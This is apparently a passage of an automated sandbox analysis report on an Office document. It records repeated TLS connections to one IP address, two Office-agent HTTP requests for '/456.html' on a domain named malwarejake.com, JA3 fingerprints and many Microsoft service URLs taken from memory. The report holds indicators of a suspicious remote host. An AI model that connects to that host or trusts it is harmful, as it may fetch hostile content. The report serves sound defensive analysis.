          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49756
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49756
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49756
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49756
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49756
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: Joe Sandbox ViewASN Name: LDCOMNETFR LDCOMNETFR
          Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /456.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: www.malwarejake.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /456.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: www.malwarejake.comIf-Modified-Since: Tue, 31 May 2022 01:57:49 GMTIf-None-Match: "1b90-5e045198f8aaa"Connection: Keep-Alive
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.aadrm.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.aadrm.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.cortana.ai
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.diagnostics.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.microsoftstream.com/api/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.office.net
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.onedrive.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://apis.live.net/v5.0/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://augloop.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://augloop.office.com/v2
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://cdn.entity.
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://clients.config.office.net/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://config.edge.skype.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://cortana.ai
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://cortana.ai/api
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://cr.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://dataservice.o365filtering.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://dataservice.o365filtering.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://dev.cortana.ai
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://devnull.onenote.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://directory.services.
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://enrichment.osi.office.net/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://graph.ppe.windows.net
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://graph.ppe.windows.net/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://graph.windows.net
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://graph.windows.net/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://incidents.diagnostics.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://invites.office.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://lifecycle.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://login.microsoftonline.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://login.windows.local
